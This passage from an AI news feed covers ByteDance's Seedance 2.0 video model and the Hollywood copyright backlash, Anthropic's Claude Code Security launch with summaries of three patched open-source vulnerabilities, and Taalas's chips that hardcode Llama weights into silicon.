(free basic, paid pro), bundling with Google Workspace subscriptions, or integration with Google Ads credits that create a content-to-advertising pipeline. The five-month pace from launch to full marketing suite suggests Google is moving toward one of these faster than the &quot;Labs experiment&quot; label implies.</p> <p>For small businesses, the calculus is simple. The tool is free, the output quality is good, and the worst case is that Google eventually charges for it or shuts it down. Use it while it lasts.</p> <p>For product photographers, the calculus is less comfortable. The $200 product shoot market is not coming back.</p> <hr> <p><strong>Sources:</strong></p> <ul> <li><a href="https://blog.google/innovation-and-ai/models-and-research/google-labs/pomelli-photoshoot/">Create studio-quality marketing assets with Photoshoot in Pomelli</a> (Google Blog)</li> <li><a href="https://blog.google/innovation-and-ai/models-and-research/google-labs/pomelli/">Google Labs and DeepMind launch AI marketing tool Pomelli</a> (Google Blog)</li> <li><a href="https://petapixel.com/2026/02/20/googles-pomelli-photoshoot-feature-is-here-to-hammer-nails-into-the-coffin-of-photography/">Google's Pomelli Photoshoot Feature is Here to Hammer Nails into the Coffin of Photography</a> (PetaPixel)</li> <li><a href="https://www.aireadycmo.com/p/google-is-quietly-building-a-free">Google Is Quietly Building a Free Marketing Suite</a> (AI Ready CMO)</li> <li><a href="https://deepmind.google/models/gemini-image/">Gemini Image (Nano Banana)</a> (Google DeepMind)</li> </ul>Sophie ZhangNewsByteDance's Seedance 2.0 Is the Best AI Video Generator You Might Not Get to Usehttps://awesomeagents.ai/news/bytedance-seedance-2-hollywood-copyright-war/Fri, 20 Feb 2026 22:10:00 +0100https://awesomeagents.ai/news/bytedance-seedance-2-hollywood-copyright-war/<div class="news-tldr"> <p><strong>Key Specs</strong></p> <table> <thead> <tr> <th>Spec</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>Architecture</td> <td>Dual-branch diffusion transformer</td> </tr> <tr> <td>Resolution</td> <td>Native 2K (2048x1152)</td> </tr> <tr> <td>Video length</td> <td>4-15 seconds</td> </tr> <tr> <td>Input modalities</td> <td>4 (text, image, audio, video)</td> </tr> <tr> <td>Audio generation</td> <td>Native sync, multi-language</td> </tr> <tr> <td>Aspect ratios</td> <td>16:9, 9:16, 4:3, 3:4, 21:9, 1:1</td> </tr> <tr> <td>Price</td> <td>~$0.60 per 10-second clip</td> </tr> <tr> <td>Availability</td> <td>China now, global Q2 2026 (TBD)</td> </tr> </tbody> </table> </div> <p>ByteDance launched Seedance 2.0 on February 7, and within a week, Disney, Paramount, Warner Bros. Discovery, Netflix, SAG-AFTRA, and the Motion Picture Association had all sent cease-and-desist letters or public condemnations. The model went viral on Weibo with tens of millions of views. Then Hollywood noticed users were generating Tom Cruise fighting Brad Pitt on rooftops, SpongeBob in live-action, and Star Wars scenes with original voice cloning.</p><div class="news-tldr"> <p><strong>Key Specs</strong></p> <table> <thead> <tr> <th>Spec</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>Architecture</td> <td>Dual-branch diffusion transformer</td> </tr> <tr> <td>Resolution</td> <td>Native 2K (2048x1152)</td> </tr> <tr> <td>Video length</td> <td>4-15 seconds</td> </tr> <tr> <td>Input modalities</td> <td>4 (text, image, audio, video)</td> </tr> <tr> <td>Audio generation</td> <td>Native sync, multi-language</td> </tr> <tr> <td>Aspect ratios</td> <td>16:9, 9:16, 4:3, 3:4, 21:9, 1:1</td> </tr> <tr> <td>Price</td> <td>~$0.60 per 10-second clip</td> </tr> <tr> <td>Availability</td> <td>China now, global Q2 2026 (TBD)</td> </tr> </tbody> </table> </div> <p>ByteDance launched Seedance 2.0 on February 7, and within a week, Disney, Paramount, Warner Bros. Discovery, Netflix, SAG-AFTRA, and the Motion Picture Association had all sent cease-and-desist letters or public condemnations. The model went viral on Weibo with tens of millions of views. Then Hollywood noticed users were generating Tom Cruise fighting Brad Pitt on rooftops, SpongeBob in live-action, and Star Wars scenes with original voice cloning.</p> <p>The irony is that underneath the copyright firestorm sits genuinely impressive engineering. Seedance 2.0 is the first video generation model to ship simultaneous audio-video synthesis from a single architecture, and its multimodal input system accepts more reference types than anything else on the market. Whether it survives the legal barrage long enough to matter globally is another question.</p> <h2 id="the-architecture">The Architecture</h2> <h3 id="dual-branch-transformer">Dual-Branch Transformer</h3> <p>Where competitors like Sora 2 and <a href="/tools/best-ai-video-generators-2026/">Veo 3</a> treat audio as a post-processing step layered on after video generation, Seedance 2.0's dual-branch transformer generates video and audio in a single forward pass. One branch handles the visual stream, the other handles audio, and they share attention across a unified multimodal representation. The result is lip-synced dialogue, ambient soundscapes, and sound effects that are temporally aligned at generation time, not stitched together after the fact.</p> <p>The model is built on a diffusion transformer backbone running on ByteDance's Volcengine infrastructure. Internal benchmarks on SeedVideoBench-2.0 show it outperforming competitors in motion stability and physical consistency, with the system calculating movement based on real-world physics simulation rather than learned visual heuristics alone.</p> <h3 id="multimodal-input-system">Multimodal Input System</h3> <p>Seedance 2.0 currently stands alone in supporting four input modalities simultaneously:</p> <ul> <li>Up to 9 reference images for character and scene control</li> <li>Up to 3 video clips (15 seconds combined) for motion reference</li> <li>Up to 3 audio files (MP3, 15 seconds total) for voice and sound reference</li> <li>Text prompts in natural language</li> </ul> <p>Sora 2 accepts text and a single image. Runway Gen-4.5 takes text and image. Veo 3.1 works with text. Seedance 2.0 lets you feed it a product photo, a reference video of how you want the camera to move, an audio clip of your brand's voice actor, and a text description of the scene - all in one API call. For commercial production work, that is a fundamentally different workflow.</p> <h3 id="multi-shot-native-generation">Multi-Shot Native Generation</h3> <p>The most underrated feature: Seedance 2.0 generates multi-shot sequences from a single prompt. Feed it a narrative description and it automatically parses it into wide shots, close-ups, and medium shots with smooth transitions between them. Character consistency is maintained across cuts. No other publicly available model does this natively.</p> <h2 id="how-it-stacks-up">How It Stacks Up</h2> <table> <thead> <tr> <th>Feature</th> <th>Seedance 2.0</th> <th>Sora 2</th> <th>Veo 3.1</th> <th>Runway Gen-4.5</th> </tr> </thead> <tbody> <tr> <td>Max resolution</td> <td>2K (2048x1152)</td> <td>1080p (1792x1024 Pro)</td> <td>4K</td> <td>1080p</td> </tr> <tr> <td>Max duration</td> <td>15s</td> <td>25s</td> <td>8s</td> <td>10s</td> </tr> <tr> <td>Input modalities</td> <td>4</td> <td>2</td> <td>1</td> <td>2</td> </tr> <tr> <td>Native audio</td> <td>Yes (sync)</td> <td>Yes</td> <td>Yes</td> <td>No</td> </tr> <tr> <td>Multi-shot</td> <td>Native</td> <td>No</td> <td>No</td> <td>No</td> </tr> <tr> <td>Physics sim</td> <td>Strong</td> <td>Best-in-class</td> <td>Good</td> <td>Good</td> </tr> <tr> <td>Price per 10s clip</td> <td>~$0.60</td> <td>~$3-5</td> <td>Vertex pricing</td> <td>~$1.50</td> </tr> <tr> <td>API available</td> <td>Yes</td> <td>Yes</td> <td>Yes (Vertex)</td> <td>Yes</td> </tr> </tbody> </table> <p>The pricing gap is significant. At roughly $0.60 per 10-second clip via Dreamina, Seedance 2.0 costs 5-8x less than Sora 2's $3-5 range. For production studios generating hundreds of clips for iteration and review, that math changes the entire workflow economics. As we noted in our <a href="/tools/best-ai-video-generators-2026/">AI video generators roundup</a>, cost per clip is becoming as important as visual quality for commercial adoption.</p> <p>Generation speed is also competitive: sub-60 seconds for a 5-second clip, 30% faster than Seedance 1.5. That puts it in the same tier as Runway and significantly faster than Sora 2's variable queue times.</p> <h2 id="the-copyright-problem">The Copyright Problem</h2> <p>The technical capability is precisely what created the legal crisis. Users immediately used Seedance 2.0 to generate clips featuring copyrighted characters and real actors. The Motion Picture Association said the platform engaged in &quot;unauthorized use of U.S. copyrighted works on a massive scale&quot; within a single day of viral adoption.</p> <p>The cease-and-desist list reads like a Hollywood rolodex:</p> <ul> <li><strong>Disney</strong> - cited unauthorized generation of Star Wars, Marvel, and other franchise content</li> <li><strong>Paramount</strong> - listed South Park, SpongeBob SquarePants, Star Trek, Teenage Mutant Ninja Turtles, The Godfather, Dora the Explorer, and Avatar: The Last Airbender as infringed properties</li> <li><strong>Warner Bros. Discovery</strong> - accused ByteDance of &quot;deliberately rolling out Seedance 2.0 without safeguards&quot;</li> <li><strong>Netflix</strong> - threatened &quot;immediate litigation&quot; over Stranger Things clips</li> <li><strong>SAG-AFTRA and the Human Artistry Campaign</strong> - condemned unauthorized deepfakes and voice clones of actors, calling it &quot;an attack on every creator around the world&quot;</li> </ul> <p>ByteDance responded by pledging to &quot;strengthen intellectual property protections&quot; and implement measures against unauthorized use of materials and likenesses. China's regulators also stepped in: new verification requirements for creating digital avatars were introduced, and ByteDance's own RedNote platform began restricting unlabeled AI-generated content.</p> <p>ByteDance also suspended a Seedance 2.0 feature that could turn facial photos into personal voices, citing &quot;potential risks.&quot; That feature alone highlights the dual-use problem with multimodal synthesis this capable.</p> <h2 id="the-geopolitical-layer">The Geopolitical Layer</h2> <p>Seedance 2.0 is drawing explicit comparisons to the <a href="/guides/open-source-vs-proprietary-ai/">DeepSeek moment</a> - another case of a Chinese AI lab releasing a model that caught Western incumbents off guard on capability-per-dollar. ByteDance built this on its own Volcengine cloud, with its own training data pipeline, on its own hardware allocation strategy.</p> <p>The timing matters. ByteDance is still fighting TikTok's regulatory fate in the United States. Releasing a model that immediately generates unauthorized Hollywood IP is not great optics for a company trying to prove it can be a responsible platform operator in Western markets. The copyright backlash could easily become a data point in the broader regulatory argument against ByteDance operating in the US.</p> <blockquote> <p>&quot;The more sophisticated these applications are, the more potentially harmful they become,&quot; observed Rogier Creemers, a researcher in Chinese digital governance.</p></blockquote> <p>The planned global rollout in Q2 2026 now looks uncertain. A model this capable, with this much legal exposure, launching internationally while its parent company is under active legislative scrutiny - the business risk calculation just changed.</p> <h2 id="what-to-watch">What To Watch</h2> <p>The technical achievement is real. Seedance 2.0's dual-branch architecture for simultaneous audio-video generation is a genuine architectural advance, not incremental tuning. The <a href="/leaderboards/multimodal-benchmarks-leaderboard/">multimodal benchmarks</a> will need updating when independent evaluators get access.</p> <p>But three things will determine whether this matters outside China:</p> <ol> <li> <p><strong>Guardrails vs. capability.</strong> ByteDance has to build content filters that block copyrighted character generation without destroying the model's generality. Every video gen model struggles with this, but Seedance 2.0's multi-reference input system makes filtering harder - you can reconstruct a character from oblique reference images that individually pass content filters.</p> </li> <li> <p><strong>API availability.</strong> The model is available now through Dreamina and third-party providers, but the official API pricing for international markets has not been announced. A $0.60-per-clip model with 2K resolution and native audio would immediately undercut every Western competitor on price-performance.</p> </li> <li> <p><strong>Regulatory fallout.</strong> If Disney and Paramount follow through with litigation rather than settling for improved filters, the legal precedent could affect every video generation model, not just Seedance. The question of whether a model trained on copyrighted material constitutes infringement when users generate similar content remains unresolved in most jurisdictions.</p> </li> </ol> <hr> <p>Seedance 2.0 is the most capable video generation model that most of the world cannot easily access yet. The engineering is ahead of the policy. That gap will either close through better guardrails or through litigation - and the answer will shape not just ByteDance's roadmap, but the entire <a href="/reviews/review-midjourney-v7/">AI-generated media landscape</a> for the next year.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://seed.bytedance.com/en/seedance2_0">Seedance 2.0 Official Page</a> (ByteDance Seed)</li> <li><a href="https://www.pymnts.com/artificial-intelligence-2/2026/bytedances-seedance-2-0-builds-buzz-in-expanding-video-generation-market">ByteDance's Seedance 2.0 Builds Buzz in Expanding Video Generation Market</a> (PYMNTS)</li> <li><a href="https://www.cnn.com/2026/02/20/china/china-ai-seedance-intl-hnk-dst">Seedance 2.0: China's latest AI is so good it's spooked Hollywood</a> (CNN)</li> <li><a href="https://deadline.com/2026/02/bytedance-halt-seedance-legal-threats-disney-paramount-1236725770/">ByteDance To Halt Seedance 2.0's AI Rip-Offs After Legal Threats From Disney &amp; Paramount</a> (Deadline)</li> <li><a href="https://variety.com/2026/film/news/paramount-disney-bytedance-cease-and-desist-seedance-ai-infringement-ip-1236663663/">Paramount, Disney Send ByteDance Seedance AI Cease-and-Desist Letters</a> (Variety)</li> <li><a href="https://www.hollywoodreporter.com/business/business-news/warner-bros-cease-and-desist-says-tiktok-owner-ip-1236508224/">Warner Bros. Discovery Sends Cease and Desist to ByteDance Over AI</a> (The Hollywood Reporter)</li> <li><a href="https://variety.com/2026/tv/news/netflix-bytedance-immediate-litigation-seedance-ai-1236666084/">Netflix Threatens ByteDance With 'Immediate Litigation' Over Seedance 2.0 AI Clips</a> (Variety)</li> <li><a href="https://techcrunch.com/2026/02/15/hollywood-isnt-happy-about-the-new-seedance-2-0-video-generator/">Hollywood isn't happy about the new Seedance 2.0 video generator</a> (TechCrunch)</li> <li><a href="https://mezha.net/eng/bukvy/bytedance-seedance-2-0-faces-copyright-backlash-and-global-ai-regulation-pressure/">ByteDance Seedance 2.0 Faces Copyright Backlash and Global AI Regulation Pressure</a> (Mezha)</li> <li><a href="https://technode.com/2026/02/10/bytedance-suspends-seedance-2-0-feature-that-turns-facial-photos-into-personal-voices-over-potential-risks/">ByteDance suspends Seedance 2.0 feature that turns facial photos into personal voices</a> (TechNode)</li> </ul>Sophie ZhangNewsAnthropic Launches Claude Code Security, Tanks Cybersecurity Stocks in a Single Afternoonhttps://awesomeagents.ai/news/anthropic-claude-code-security-launch/Fri, 20 Feb 2026 21:00:00 +0100https://awesomeagents.ai/news/anthropic-claude-code-security-launch/<p>Anthropic announced <a href="https://www.anthropic.com/news/claude-code-security">Claude Code Security</a> today, a tool that scans codebases for security vulnerabilities and generates patches for human review. Within hours, CrowdStrike dropped 7.9%, Okta fell 9.6%, Cloudflare lost 7%, and the Global X Cybersecurity ETF shed 4.6%. The cybersecurity industry read the announcement and did not like what it saw.</p><p>Anthropic announced <a href="https://www.anthropic.com/news/claude-code-security">Claude Code Security</a> today, a tool that scans codebases for security vulnerabilities and generates patches for human review. Within hours, CrowdStrike dropped 7.9%, Okta fell 9.6%, Cloudflare lost 7%, and the Global X Cybersecurity ETF shed 4.6%. The cybersecurity industry read the announcement and did not like what it saw.</p> <p>The tool is built on Claude Opus 4.6 and arrives with a striking credential: Anthropic's Frontier Red Team used it to find over 500 high-severity vulnerabilities in production open-source codebases, including bugs that had survived decades of human review, fuzzing, and static analysis.</p> <h2 id="what-claude-code-security-does">What Claude Code Security Does</h2> <p>The pitch is straightforward. Point it at a codebase and it reasons about the code the way a human security researcher would - tracing data flows across components, reading Git commit history, understanding how different parts of an application interact. When it finds something, it runs an adversarial self-verification pass (trying to disprove its own findings), assigns severity and confidence ratings, and suggests a patch. Nothing gets applied without human approval.</p> <p>This is fundamentally different from traditional static analysis tools like Snyk, CodeQL, or Semgrep, which match code patterns against databases of known vulnerability signatures. Claude Code Security does not pattern-match. It reads and reasons. The distinction matters because the most dangerous vulnerabilities - the ones that persist for decades in critical software - are precisely the ones that do not match known patterns.</p> <p>Logan Graham, who leads Anthropic's Frontier Red Team, described Claude as acting like &quot;a junior security researcher&quot; that can &quot;explore codebases step-by-step, test component behavior, and follow leads&quot; - but at a speed no human team can match.</p> <h2 id="the-500-vulnerabilities">The 500 Vulnerabilities</h2> <p>The headline number is attention-getting. The details are more so. Anthropic's red team has publicly detailed three findings, with the remaining 500+ still in responsible disclosure:</p> <p><strong>Ghostscript</strong> - Claude found a stack bounds checking vulnerability in font handling that both fuzzing and manual analysis had missed. The approach was clever: Claude read the project's Git commit history, identified a security-relevant patch that added stack bounds checking for MM blend values, and noticed the fix was incomplete - the check had been added in one location but missed in another file (<code>gdevpsfx.c</code>). It then constructed a proof-of-concept crash. Fixed in Ghostscript 10.03.0.</p> <p><strong>OpenSC</strong> - A buffer overflow caused by sequential <code>strcat</code> operations on a fixed 4096-byte buffer without length validation. Traditional fuzzers rarely reach this code path due to the preconditions required to trigger it. Claude found it by searching for known-dangerous function call patterns (<code>strrchr()</code>, <code>strcat()</code>) and reasoning about the buffer arithmetic. Fixed in OpenSC 0.25.0.</p> <p><strong>CGIF</strong> - A heap buffer overflow in the GIF library's LZW compression handling. This one is particularly interesting because triggering it requires a conceptual understanding of the LZW algorithm: when the symbol table fills up, reset tokens cause compressed output to exceed the input buffer size. No amount of line and branch coverage testing would catch this. Claude understood the algorithm well enough to identify the flaw. Fixed in CGIF 0.5.1.</p> <p>The <a href="https://red.anthropic.com/2026/zero-days/">technical write-ups</a> are worth reading in full. The Ghostscript finding - using Git history to identify an incomplete patch - is an approach that most human auditors would not routinely apply at scale.</p> <h2 id="the-research-behind-it">The Research Behind It</h2> <p>Claude Code Security did not appear overnight. Anthropic's Frontier Red Team has been building toward this for over a year, entering Claude in seven cybersecurity competitions throughout 2025:</p> <table> <thead> <tr> <th>Competition</th> <th>Result</th> </tr> </thead> <tbody> <tr> <td>PicoCTF 2025</td> <td>Top 3% globally (297th of 10,460 teams)</td> </tr> <tr> <td>HackTheBox AI vs Human CTF</td> <td>30th of 161 teams, solved 19/20 challenges</td> </tr> <tr> <td>Western Regional CCDC</td> <td>6th of 9 qualified teams</td> </tr> <tr> <td>Airbnb CTF (invite-only)</td> <td>13/30 in first 60 minutes (4th place)</td> </tr> <tr> <td>PlaidCTF</td> <td>Failed to solve any challenges</td> </tr> <tr> <td>DEF CON CTF Qualifier</td> <td>Failed to solve any challenges</td> </tr> </tbody> </table> <p>The pattern is consistent with what we see across <a href="/reviews/ai-cybersecurity-ranges-platforms-2026/">AI security benchmarks</a>: AI excels at beginner-to-intermediate challenges but struggles with elite-level problems requiring creative lateral thinking. When Claude can solve a challenge, it does so as fast or faster than top human teams. The ceiling is the issue, not the speed.</p> <p>Separately, Anthropic partnered with Pacific Northwest National Laboratory to test Claude against a simulated water treatment facility. The result: attack reconstruction completed in approximately 3 hours versus multiple weeks of human expert analysis. During testing, Claude autonomously adapted its approach when an initial tool failed, finding an alternative UAC bypass technique on its own.</p> <h2 id="how-it-compares">How It Compares</h2> <p>The obvious comparison is Google's Big Sleep project, a collaboration between Project Zero and DeepMind that found roughly 20 vulnerabilities in open-source projects, including an exploitable stack buffer underflow in SQLite. Claude Code Security found 500+ with no task-specific tooling, custom scaffolding, or specialized prompting - what Anthropic describes as &quot;out of the box&quot; capability.</p> <p>The deeper comparison is with the tools the market currently relies on. Snyk Code hits roughly 85% accuracy with an 8% false positive rate. CodeQL achieves about 88% accuracy with 5% false positives. Semgrep sits at 82% accuracy with 12% false positives. These tools are good at what they do, but what they do is pattern matching. The CGIF vulnerability - requiring conceptual understanding of LZW compression internals - is categorically outside their detection capability. So is the Ghostscript finding, which required cross-referencing Git history with source code.</p> <p>Aikido Security raised a fair counterpoint: &quot;Finding a vulnerability is rarely the hardest part.&quot; The real bottleneck in production security is determining reachability, actual exploitability, patch impact, and fix prioritization. Claude Code Security improves detection but does not inherently solve these system-level challenges. Tenable's CTO made a similar argument: without topology context, threat context, and business impact context, more findings create noise rather than actionable improvement.</p> <p>Both points are valid. Both are also points that apply equally to every existing security tool, none of which solve prioritization either. The difference is that Claude Code Security finds things the others cannot find at all.</p> <h2 id="why-wall-street-panicked">Why Wall Street Panicked</h2> <p>The cybersecurity stock selloff was not about Claude Code Security replacing CrowdStrike or Okta - those companies do endpoint protection and identity management, not code scanning. The selloff was about trajectory. If an AI tool can find 500 zero-days &quot;out of the box&quot; today, investors are doing the math on what next year's model finds, and what that means for the pricing power of standalone security products.</p> <p>The concern is not that security spending disappears. It is that the work shifts from expensive standalone security platforms toward AI-assisted scanning embedded directly in the <a href="/tools/best-ai-coding-assistants-2026/">coding workflow</a>. Anthropic is not selling a security product at a per-seat security product price. It is bundling security capability into Claude Code, which developers are already paying for.</p> <h2 id="availability">Availability</h2> <p>Claude Code Security is in limited research preview for Enterprise and Team customers. Open-source repository maintainers get free expedited access - a deliberate choice that Anthropic framed as supporting &quot;the often under-resourced developers responsible for keeping widely used public software running safely.&quot;</p> <p>A <a href="https://github.com/anthropics/claude-code-security-review">GitHub Action</a> is already available for CI/CD integration, performing semantic security audits of pull requests. It comes with a candid caveat: &quot;This action is not hardened against prompt injection attacks and should only be used to review trusted PRs.&quot;</p> <p>Enterprise pricing is usage-based. Team plans start at $25/person/month, with Premium seats at $150/person/month for Claude Code access. No per-scan pricing has been disclosed for the security capability specifically.</p> <h2 id="what-this-means">What This Means</h2> <p>The cybersecurity industry has spent decades building tools that detect known vulnerability patterns. Claude Code Security detects unknown ones. The Ghostscript finding - using Git history to identify an incomplete security patch - is not a technique any static analysis tool implements. The CGIF finding - requiring algorithmic understanding of LZW compression - is not a technique any fuzzer would reach. These are qualitatively new capabilities, not incremental improvements to existing approaches.</p> <p>The dual-use concern is real and acknowledged. Anthropic introduced &quot;cyber-specific probes&quot; that monitor model activations during response generation to detect malicious usage in real time. Their own safety reports note that Claude Opus 4.5 and 4.6 show &quot;elevated susceptibility to harmful misuse in certain computer use settings.&quot; The same capability that finds 500 vulnerabilities for defenders can, in different hands, find 500 vulnerabilities for attackers.</p> <p>Anthropic is betting that giving defenders these tools first - and making them freely available to open-source maintainers - tips the balance in the right direction. Whether that bet pays off depends on how fast the other side adapts. But as of today, Claude can find bugs that survived decades of human review, and the security industry's stock prices suggest the market believes it.</p> <hr> <p><strong>Sources:</strong></p> <ul> <li><a href="https://www.anthropic.com/news/claude-code-security">Claude Code Security Announcement</a> (Anthropic)</li> <li><a href="https://red.anthropic.com/2026/zero-days/">Anthropic 0-Days: AI-Powered Vulnerability Discovery</a> (Anthropic Frontier Red Team)</li> <li><a href="https://red.anthropic.com/2026/critical-infrastructure-defense/">Critical Infrastructure Defense with PNNL</a> (Anthropic Frontier Red Team)</li> <li><a href="https://fortune.com/2026/02/20/exclusive-anthropic-rolls-out-ai-tool-that-can-hunt-software-bugs-on-its-own-including-the-most-dangerous-ones-humans-miss/">Anthropic Rolls Out AI Tool That Can Hunt Software Bugs on Its Own</a> (Fortune)</li> <li><a href="https://thehackernews.com/2026/02/claude-opus-46-finds-500-high-severity.html">Claude Opus 4.6 Finds 500+ High-Severity Vulnerabilities</a> (The Hacker News)</li> <li><a href="https://www.bloomberg.com/news/articles/2026-02-20/cyber-stocks-slide-as-anthropic-unveils-claude-code-security">Cyber Stocks Slide as Anthropic Unveils Claude Code Security</a> (Bloomberg)</li> <li><a href="https://red.anthropic.com/2025/cyber-competitions/">Anthropic CTF Competitions Research</a> (Anthropic Frontier Red Team)</li> <li><a href="https://www.aikido.dev/blog/claude-opus-4-6-500-vulnerabilities-software-security">Anthropic Claude Code Security - Aikido Security Analysis</a> (Aikido Security)</li> </ul>Elena MarchettiNewsTaalas Exits Stealth With $169 Million to Hardcode AI Models Into Siliconhttps://awesomeagents.ai/news/taalas-169m-ai-chip-nvidia-challenge/Fri, 20 Feb 2026 19:00:00 +0100https://awesomeagents.ai/news/taalas-169m-ai-chip-nvidia-challenge/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Taalas raised $169M (Series B led by Quiet Capital and Fidelity) to build chips that permanently encode AI model weights into transistors</li> <li>Its HC1 chip generates 17,000 tokens per second on Llama 3.1 8B, claiming 73x faster than Nvidia's H200 at one-tenth the power</li> <li>Founded by three ex-Tenstorrent/AMD veterans; team of 25 has spent only $30M of $200M+ raised</li> <li>First product ships now; a 20B-parameter chip is expected this summer, frontier models by year-end</li> </ul> </div> <p>Most AI chip startups pitch themselves as &quot;Nvidia, but better.&quot; Taalas is pitching something stranger: what if the model <em>is</em> the chip?</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Taalas raised $169M (Series B led by Quiet Capital and Fidelity) to build chips that permanently encode AI model weights into transistors</li> <li>Its HC1 chip generates 17,000 tokens per second on Llama 3.1 8B, claiming 73x faster than Nvidia's H200 at one-tenth the power</li> <li>Founded by three ex-Tenstorrent/AMD veterans; team of 25 has spent only $30M of $200M+ raised</li> <li>First product ships now; a 20B-parameter chip is expected this summer, frontier models by year-end</li> </ul> </div> <p>Most AI chip startups pitch themselves as &quot;Nvidia, but better.&quot; Taalas is pitching something stranger: what if the model <em>is</em> the chip?</p> <p>The Toronto-based startup emerged from stealth on February 19, disclosing $169 million in Series B funding and a first product that claims to generate 17,000 tokens per second on Meta's Llama 3.1 8B. That is 73 times faster than Nvidia's H200 GPU on the same model, according to the company, while consuming roughly one-tenth the power.</p> <p>The investors backing that claim include Quiet Capital, Fidelity, and Pierre Lamond, a semiconductor veteran who was an early investor in National Semiconductor and Cypress. Total funding now exceeds $200 million across three rounds. What is unusual: the company says it has spent only $30 million of that total so far.</p> <h2 id="the-technology">The Technology</h2> <p>Taalas does not build general-purpose inference accelerators. It builds chips where a specific AI model's weights are permanently etched into the transistor logic using a mask ROM recall fabric. No HBM. No SRAM for weights. No external memory bandwidth bottleneck. The company claims it can store four bits and perform the associated multiply operation with a single transistor.</p> <p>The result is extreme density. The HC1, its first silicon, packs 53 billion transistors into an 815 mm squared die on TSMC's 6-nanometer process. The entire Llama 3.1 8B model fits on one chip. The card draws roughly 200 watts, runs on standard PCIe, and needs only air cooling.</p> <h3 id="how-it-ships">How It Ships</h3> <p>The trick that makes this economically plausible is that Taalas does not redesign the full chip for each model. Of the roughly 100 layers in a modern chip, only two metal layers are customized per model. That means TSMC can turn a new model-specific chip in approximately two months, according to the company.</p> <h2 id="the-numbers">The Numbers</h2> <table> <thead> <tr> <th>Metric</th> <th>Taalas HC1</th> <th>Nvidia H200</th> <th>Nvidia B200</th> </tr> </thead> <tbody> <tr> <td>Model</td> <td>Llama 3.1 8B</td> <td>Llama 3.1 8B</td> <td>Llama 3.1 8B</td> </tr> <tr> <td>Tokens/sec per user</td> <td>17,000</td> <td>~230</td> <td>~400</td> </tr> <tr> <td>Power per card</td> <td>~200W</td> <td>~700W</td> <td>~1,000W</td> </tr> <tr> <td>Cooling</td> <td>Air</td> <td>Liquid (typical)</td> <td>Liquid</td> </tr> <tr> <td>Manufacturing cost (claimed)</td> <td>1/20x GPU</td> <td>Baseline</td> <td>Baseline</td> </tr> <tr> <td>Process</td> <td>TSMC N6</td> <td>TSMC N5</td> <td>TSMC N4</td> </tr> </tbody> </table> <p>Taalas claims its 8-card 4U system draws about 2.5 kW with air cooling, a fraction of what equivalent GPU clusters require. If the cost and power numbers hold up at scale, the implications for <a href="/tools/free-ai-inference-providers-2026/">inference economics</a> are significant.</p> <h2 id="the-team">The Team</h2> <p>The founding team reads like an AMD reunion. CEO Ljubisa Bajic designed AMD's hybrid CPU-GPU architectures before founding Tenstorrent and briefly joining Nvidia. COO Lejla Bajic spent years as a senior manager at AMD during its GPU evolution. CTO Drago Ignjatovic was AMD's ASIC director and later VP of hardware engineering at Tenstorrent.</p> <p>VP of Products Paresh Kharya came from Google Cloud, where he managed GPU and TPU ecosystems. The 25-person engineering team draws from AMD, Apple, Google, Nvidia, and Tenstorrent. The company has filed at least 14 patents.</p> <h2 id="who-benefits">Who Benefits</h2> <p><strong>Inference-heavy API providers</strong> stand to gain the most. If Taalas delivers on its cost claims, providers running high-volume, latency-sensitive workloads on a stable model could slash their cost per token dramatically. Kharya's argument is that training a frontier model costs billions, making a custom inference chip at a fraction of that cost a rational investment for anyone deploying at scale.</p> <p><strong>Edge and embedded AI</strong> is another target. A 200-watt card that fits in a standard rack without liquid cooling opens doors for deployment outside hyperscaler data centers. Taalas specifically mentions robotics and real-time voice agents as use cases where 17,000 tokens per second per user changes what is architecturally possible.</p> <p><strong>Open-source model ecosystems</strong> could benefit indirectly. Taalas chose Meta's Llama as its first target, and the company's roadmap is explicitly built around <a href="/guides/how-to-run-open-source-llm-locally/">open-weight models</a> that can be freely embedded in custom silicon without licensing friction. If the approach works, it creates a hardware incentive for model standardization.</p> <h2 id="who-pays">Who Pays</h2> <p><strong>Flexibility is the obvious cost.</strong> The model is permanently burned into silicon. You cannot fine-tune the weights, swap architectures, or upgrade to next week's release. In an industry where new models ship monthly, committing to a specific model for the life of a chip is a bet that some models will stabilize as infrastructure rather than continuing to churn.</p> <p>Hacker News commenters were not shy about this point. Multiple users tested Taalas's demo chatbot and reported hallucinations and accuracy issues, which is expected from a heavily quantized 8B model but raises the question of whether raw speed compensates for quality gaps. The chip uses aggressive 3-bit and 6-bit quantization, which trades accuracy for density.</p> <p><strong>The two-month turnaround claim also deserves scrutiny.</strong> Experienced hardware engineers in the HN discussion called the timeline &quot;ambitious&quot; for leading-edge silicon, even with only two metal layers changing. TSMC's fabrication queues do not always accommodate small-batch custom orders on the timeline a startup might prefer.</p> <p><strong>Market size is the deeper question.</strong> As several analysts noted, this targets perhaps 5 to 10 percent of <a href="/news/nvidia-openai-100b-deal-collapses-30b-equity/">Nvidia's market</a> - the slice where a single model runs at extreme volume for long enough to justify custom silicon. Training and research workloads, which require flexibility, remain firmly GPU territory.</p> <h2 id="the-competitive-landscape">The Competitive Landscape</h2> <p>Taalas is entering a graveyard. The list of AI chip startups that raised hundreds of millions and then got acquired at a fraction of their ambitions is long: Graphcore (sold to SoftBank for $600 million), Groq (acquired by Nvidia for $20 billion), SambaNova (acquired by Intel for a reported $1.6 billion). Each took a different approach to the same problem. None displaced Nvidia.</p> <p>What distinguishes Taalas is the specificity of its bet. It is not trying to build a better general-purpose chip. It is building disposable, model-specific silicon and betting that the economics of extreme specialization outweigh the cost of inflexibility. The company's roadmap calls for a 20-billion-parameter chip this summer and frontier-class models on its next-generation HC2 architecture by year-end.</p> <blockquote> <p>&quot;Instead of building a better general-purpose computer to run models, Taalas asked: What if we could turn the models themselves into specialized computers?&quot; - Alex Kvamme, Quiet Capital</p></blockquote> <h2 id="what-happens-next">What Happens Next</h2> <p>Taalas says its Llama 3.1 8B inference API is live now. The next milestone is the 20B-parameter HC1 chip expected this summer, followed by the HC2 architecture targeting frontier-scale models across multiple cards using pipeline parallelism. If the roadmap holds, Taalas will need to prove that its approach scales beyond small models before the current wave of investor enthusiasm cools.</p> <p>The $170 million still sitting in the bank gives the company runway, but the clock is ticking. Every month that passes, GPU inference gets cheaper, open-source models get better, and the window for model-specific silicon either opens wider or slams shut.</p> <hr> <p>Taalas is not trying to kill Nvidia - it is trying to prove that for the subset of AI 